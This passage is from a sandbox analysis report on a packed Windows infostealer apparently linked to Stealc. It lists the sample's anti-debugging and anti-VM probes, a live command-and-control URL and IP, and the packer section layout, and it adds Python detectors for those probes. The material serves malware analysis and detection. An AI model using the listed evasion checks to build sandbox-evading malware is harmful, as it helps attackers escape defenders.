                Source: file.exe, file.exe, 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1800775191.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800775191.00000000011AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13550)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13562)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13547)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13567)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13602)
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
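                The RDTSC interceptor records above list every pair of consecutive rdtsc reads the sandbox caught, together with the instructions executed between the two reads. In most records that gap is a handful of push/pop/pushad/popad shuffles and jumps, stack-neutral filler of the kind a code protector inserts (the Oreans.vxd and Software\WinLicense strings in the same section point to an Oreans protector); the difference between the two reads is what the check compares against a threshold, so single-stepping or emulation overhead shows up as an implausibly large delta. The following Python is an added example written for this page, not Joe Sandbox code: it parses these records into structured form and classifies the filler. SAMPLE_RECORDS are three lines copied from the list above; the stack/branch/other bucketing is this example's own choice.

```python
"""Parse Joe Sandbox "RDTSC instruction interceptor" records and summarise
what sits between each pair of rdtsc reads.

Added example for this report, not Joe Sandbox code. The record syntax is the
one used in the report lines above; SAMPLE_RECORDS are three of those lines
with the "Source:" prefix dropped.
"""
import re
from collections import Counter

RECORD_RE = re.compile(
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+)"
    r" instructions: (?P<body>.*)$"
)
# One instruction is "0x<offset> <mnemonic> [operands]", running up to the
# next "0x<offset>" token or the end of the line.
INSN_RE = re.compile(r"0x(?P<off>[0-9a-fA-F]{8}) (?P<text>.+?)(?= 0x[0-9a-fA-F]{8} |$)")

STACK_OPS = {"push", "pop", "pushad", "popad", "pushfd", "popfd"}

SAMPLE_RECORDS = [
    "RDTSC instruction interceptor: First address: 84C02B second address: 84C031 "
    "instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax "
    "0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    "RDTSC instruction interceptor: First address: 86E216 second address: 86E264 "
    "instructions: 0x00000000 rdtsc 0x00000002 js 00007F402CDD4F56h 0x00000008 pop edx "
    "0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax "
    "0x0000000e jmp 00007F402CDD4F63h 0x00000013 mov edx, dword ptr [ebp+122D2BC7h] "
    "0x00000019 push 00000004h 0x0000001b mov dh, bl 0x0000001d call 00007F402CDD4F59h "
    "0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F402CDD4F68h 0x00000029 rdtsc",
    "RDTSC instruction interceptor: First address: 74CFEC second address: 74CFF0 "
    "instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
]


def classify(mnemonic):
    """Bucket a mnemonic: stack shuffling, a branch (jmp/jcc/call) or real work."""
    if mnemonic in STACK_OPS:
        return "stack"
    if mnemonic.startswith("j") or mnemonic == "call":
        return "branch"
    return "other"


def parse_record(line):
    """Return both rdtsc addresses and a breakdown of the instructions between them."""
    m = RECORD_RE.search(line)
    if m is None:
        raise ValueError("not an RDTSC interceptor record: %r" % line[:60])
    insns = [(int(i.group("off"), 16), i.group("text").split()[0])
             for i in INSN_RE.finditer(m.group("body"))]
    if not insns or insns[0][1] != "rdtsc" or insns[-1][1] != "rdtsc":
        raise ValueError("record does not start and end with rdtsc")
    filler = [mn for _, mn in insns[1:-1]]
    cats = Counter(classify(mn) for mn in filler)
    return {
        "first": int(m.group("first"), 16),
        "second": int(m.group("second"), 16),
        "last_offset": insns[-1][0],       # byte offset of the second rdtsc in the trace
        "filler": filler,
        "categories": dict(cats),
        "pure_noise": cats["other"] == 0,  # only stack shuffles and jumps between the reads
    }


def summarise(lines):
    """Aggregate over many records: how many windows are pure noise, the longest
    filler run and the most common filler mnemonics."""
    records = [parse_record(l) for l in lines]
    mnemonics = Counter(mn for r in records for mn in r["filler"])
    return {
        "records": len(records),
        "pure_noise": sum(r["pure_noise"] for r in records),
        "longest_filler": max(len(r["filler"]) for r in records),
        "top_mnemonics": mnemonics.most_common(3),
    }


if __name__ == "__main__":
    for r in map(parse_record, SAMPLE_RECORDS):
        print("%06X -> %06X: %2d filler insns %s"
              % (r["first"], r["second"], len(r["filler"]), r["categories"]))
    print(summarise(SAMPLE_RECORDS))
```

                Fed the whole list above, the summary makes the pattern visible at a glance: the bulk of the windows are pure noise two to a dozen instructions long, while the few that contain mov/call work (86E216 and the 4ED0xxx records) are where the protector does something with the measured value.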

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E109A rdtsc
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003845C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00397850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
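                Each line in this section is one probe: hiding the thread from a debugger (ThreadHideFromDebugger), asking for the process debug port, looking for analysis-tool windows by class or title, opening the SoftICE device names NTICE/SICE/SIWVID and, in the previous section, reading BIOS and display-driver registry values that differ under a hypervisor. The Python below is an added example written for this page, not Joe Sandbox's signature engine: it shows how a small rule set turns a raw API trace into those categories, including the sequence rule needed for the process-snapshot walk (CreateToolhelp32Snapshot followed by a name comparison) rather than a single call. TRACE is a constructed call log in a made-up (api, args) shape; the indicator lists are the values the report shows.

```python
"""Map a recorded API trace onto the anti-debugging and anti-VM probes this
report attributes to file.exe.

Added example for this page, not Joe Sandbox code. The window names, device
names and registry values are the ones listed in the report; TRACE is a
constructed call log in an (api, args) shape invented for this example.
"""
import re

ANALYSIS_WINDOWS = {
    "regmonclass", "gbdyllo", "procmon_window_class", "ollydbg", "filemonclass",
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
}
DEBUGGER_DEVICES = {"NTICE", "SICE", "SIWVID"}  # SoftICE driver device names
VM_REGISTRY_VALUES = {
    (r"HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System", "systembiosversion"),
    (r"HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System", "videobiosversion"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class"
     r"\{4d36e968-e325-11ce-bfc1-08002be10318}\0000", "driverdesc"),
}
_VM_REG = {(k.lower(), v) for k, v in VM_REGISTRY_VALUES}
DEVICE_PATH = re.compile(r"^\\\\\.\\([A-Za-z0-9_]+)$")  # matches \\.\NAME

# Constructed trace: one hit per probe type plus two benign calls and a
# Toolhelp walk that compares a process name.
TRACE = [
    ("NtSetInformationThread", {"info_class": "ThreadHideFromDebugger"}),
    ("NtQueryInformationProcess", {"info_class": "ProcessDebugPort"}),
    ("FindWindowA", {"class_name": "OLLYDBG", "window_name": None}),
    ("FindWindowA", {"class_name": "Notepad", "window_name": None}),
    ("CreateFileA", {"path": r"\\.\SICE"}),
    ("CreateFileA", {"path": r"C:\Users\user\AppData\Local\Temp\log.txt"}),
    ("RegQueryValueExA", {"key": r"HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System",
                          "value": "SystemBiosVersion"}),
    ("CreateToolhelp32Snapshot", {}),
    ("Process32First", {}),
    ("Process32Next", {"exe": "procmon.exe"}),
    ("StrCmpCA", {"a": "procmon.exe", "b": "explorer.exe"}),
]


def match_event(api, args):
    """Return the probe category for one call, or None if the call is benign."""
    if api == "NtSetInformationThread" and args.get("info_class") == "ThreadHideFromDebugger":
        return "hide_thread_from_debugger"
    if api == "NtQueryInformationProcess" and args.get("info_class") == "ProcessDebugPort":
        return "debug_port_query"
    if api in ("FindWindowA", "FindWindowW"):
        names = {str(args.get(k) or "").lower() for k in ("class_name", "window_name")}
        if names & ANALYSIS_WINDOWS:
            return "analysis_tool_window"
    if api in ("CreateFileA", "CreateFileW"):
        m = DEVICE_PATH.match(args.get("path", ""))
        if m and m.group(1).upper() in DEBUGGER_DEVICES:
            return "debugger_device"
    if api in ("RegQueryValueExA", "RegQueryValueExW"):
        if (args.get("key", "").lower(), args.get("value", "").lower()) in _VM_REG:
            return "vm_registry_probe"
    return None


def scan_trace(trace):
    """Walk the trace and collect evidence per category. The process-snapshot
    walk is reported only when a string comparison follows the enumeration,
    which is what separates "looking for a specific process" from a plain listing."""
    hits = {}
    snapshot_open = False
    for api, args in trace:
        cat = match_event(api, args)
        if api == "CreateToolhelp32Snapshot":
            snapshot_open = True
        elif snapshot_open and api == "StrCmpCA":
            cat = "process_name_scan"
            snapshot_open = False
        if cat:
            hits.setdefault(cat, []).append((api, args))
    return hits


def probe_counts(trace):
    """Category -> number of matching calls, the shape a triage summary wants."""
    return {cat: len(ev) for cat, ev in scan_trace(trace).items()}


if __name__ == "__main__":
    for cat, n in sorted(probe_counts(TRACE).items()):
        print("%-28s %d" % (cat, n))
```

                The rules key on arguments, not just API names: FindWindowA and CreateFileA are ubiquitous in benign code, and it is the OLLYDBG class or the \\.\SICE device path that makes the call a probe.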

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: eProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00397B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00396920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00397850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00397A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.1759771807.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.1759771807.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7112, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix

                Techniques are listed per tactic column; the number in parentheses is the count of matched signatures, and techniques without a number are matrix entries with no observation.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: System Time Discovery (2); Security Software Discovery (651); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Antivirus, Machine Learning and Genetic Malware Detection

                Initial sample (Source | Detection | Scanner | Label):
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                Dropped files: No Antivirus matches
                Unpacked PE files: No Antivirus matches
                Domains: No Antivirus matches
                URLs (Source | Detection | Scanner | Label):
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
No contacted domains info
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
URLs found in memory dumps:
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37 | file.exe, 00000000.00000002.1800775191.000000000113E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpva=T | file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/4D | file.exe, 00000000.00000002.1800775191.0000000001197000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phph | file.exe, 00000000.00000002.1800775191.00000000011AA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/01 | file.exe, 00000000.00000002.1800775191.00000000011A5000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpBa | file.exe, 00000000.00000002.1800775191.0000000001184000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
The memory-dump entries with trailing junk (phpva=T, /4D, phph, /01, phpBa) are string-scanner artifacts where the URL runs into adjacent heap data; the two endpoints actually used on the wire are / and /e2b1563c6670f193.php, and only those belong in indicator lists.
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1528823
                          Start date and time:2024-10-08 10:27:19 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 80%
                          • Number of executed functions: 18
                          • Number of non-executed functions: 85
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated
                          • Report size getting too big, too many NtQueryValueKey calls found.
No simulations
Context: other submissions that contacted IP 185.215.113.37 (Associated Sample Name | Detection | Threat Name | Context; the SHA 256 and Link columns were report links and carry no text here):
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
No context
Context: other submissions in ASN WHOLESALECONNECTIONSNL (same columns):
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
7AeSqNv1rC.exe | malicious | MicroClip, Vidar | 185.215.113.117
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
No context
No context
No created / dropped files found
All ten earlier submissions that shared this IP checked in to the same path, /e2b1563c6670f193.php, so the full URL is a stable indicator for this C2, not just the address. The ASN matches also include a Vidar/MicroClip sample talking to the neighbouring host 185.215.113.117, so the surrounding addresses in AS206894 are worth watching alongside 185.215.113.37.
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.947259488047634
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'844'224 bytes
                          MD5:f10c33b85dcdad1afd46afc292250f45
                          SHA1:cbf1860f2913584c90cb369f65cc2f3f9ed07f7d
                          SHA256:fef07dfe69df3e939e6a3bc0e097b4507e052f873bd8d0cffe54508c9ce7e6af
                          SHA512:10506977154e5173fba89780137e3bdf5e7180817637a62bbd00fbef8fc58337ff71cb19a2d821446ace08b3191ce7420b746f1b998f3a63e3de4780221d4e18
                          SSDEEP:24576:k+lZYWfCkenyLbTxc8AK5Km5MsjjXkp/EO+Oqd+kE61X4sEU9oTCCPURcO9GVw3y:kexfiT8H/POs2XjTtVPdAOR
                          TLSH:1E8533D79A73CBDDEB0D46FB12BA22E071BB2025DD879E271B68766C0C1310425D5EB8
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0xa99000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (disassembly at the entry point, RVA 0x699000, the first bytes of .taggant; runs of identical instructions are collapsed with a count):
jmp 00007F402CC5FACAh
lar ebx, word ptr [eax+eax]
add byte ptr [eax], al (x2)
jmp 00007F402CC61AC5h
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al (x2)
add byte ptr [eax], dh
add byte ptr [eax], al (x3)
add byte ptr [eax], ah
add byte ptr [eax], al (x3)
add byte ptr [ecx], ah
add byte ptr [eax], al (x3)
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al (x62)
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al (x2)
adc byte ptr [eax], al
add byte ptr [eax], al (x3)
add al, 0Ah
add byte ptr [eax], al (x3)
Only the first jmp is real code: it transfers control out of .taggant to the unpacking code elsewhere in the image. What follows is data and zero padding decoded as instructions (the byte pair 00 00 disassembles as add byte ptr [eax], al), which matches the .taggant row of the section table below (file type "DOS executable (COM)", entropy 0.72).
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Only two directories are populated, both in .idata: a 0x64-byte import directory and an 8-byte base-relocation directory, which is exactly one empty IMAGE_BASE_RELOCATION block header and the minimum needed to keep DYNAMIC_BASE honoured. The IAT entry is zero although imports exist, and there is no debug, TLS, load-config or resource data: these are packer-written headers, not linker output.
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(empty name) | 0x1000 | 0x25b000 | 0x22800 | ee243077115dcafa9927faee7f28b9f3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(empty name) | 0x25e000 | 0x29d000 | 0x200 | da1e3ff8bebdf53ec3c0a590e1a30b5c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zmsppxmk | 0x4fb000 | 0x19d000 | 0x19c200 | 6e17a05154c05cb23d2430ed07ac1e1b | False | 0.9947472370715802 | data | 7.953354892161169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bobhsqhc | 0x698000 | 0x1000 | 0x400 | bd24bc7690f1e954fd8fbec4050e777a | False | 0.8388671875 | data | 6.428862276040028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x699000 | 0x3000 | 0x2200 | 48c8e8ad16c2ca4e10fa9ff8dfa44a4c | False | 0.06387867647058823 | DOS executable (COM) | 0.7231270511394494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Reading the table: two sections have empty names, every section except .rsrc and .idata is mapped read/write/execute, and the entry point (0xa99000, RVA 0x699000) is the first byte of .taggant rather than of a code section. zmsppxmk carries 0x19c200 raw bytes at entropy 7.95, nearly the whole 1'844'224-byte file, which is the compressed or encrypted payload. The first, unnamed section has a raw size of only 0x22800 against a virtual size of 0x25b000; that gap is where the unpacker writes the decrypted code at run time, and it is where the Yara hit at 0x381000 (runtime image base 0x380000 + RVA 0x1000) in the process section below lands.
Imports:
DLL | Import
kernel32.dll | lstrcpy
